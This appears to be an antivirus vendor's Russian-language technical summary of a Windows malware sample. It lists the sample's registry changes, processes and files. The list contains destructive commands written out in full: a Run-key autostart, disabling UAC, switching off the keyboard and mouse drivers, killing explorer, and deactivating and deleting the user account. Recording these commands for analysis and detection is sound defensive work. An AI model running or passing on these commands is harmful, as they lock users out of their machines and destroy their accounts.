Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Winlogon' = '%WINDIR%\chkmgr32.bat'
- Средство контроля пользовательских учетных записей (UAC)
- <SYSTEM32>\tskill.exe /f icq
- <SYSTEM32>\tskill.exe /f explorer
- <SYSTEM32>\reg.exe add HKLM\System\CurrentControlSet\Services\Kbdclass /v Start /t REG_DWORD /d 4 /f
- <SYSTEM32>\reg.exe add HKLM\System\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4 /f
- <SYSTEM32>\net1.exe user %USERNAME% /active:no
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %WINDIR%\chkmgr32.bat /f
- <SYSTEM32>\net1.exe user %username% /del
- %WINDIR%\notfall.bat
- %WINDIR%\chkmgr32.bat
- %WINDIR%\inf\1394.PNF
- %WINDIR%\inf\1394vdbg.inf
- <SYSTEM32>\hal.dll
- %WINDIR%\inf\1394.inf
- ClassName: 'Shell_TrayWnd' WindowName: ''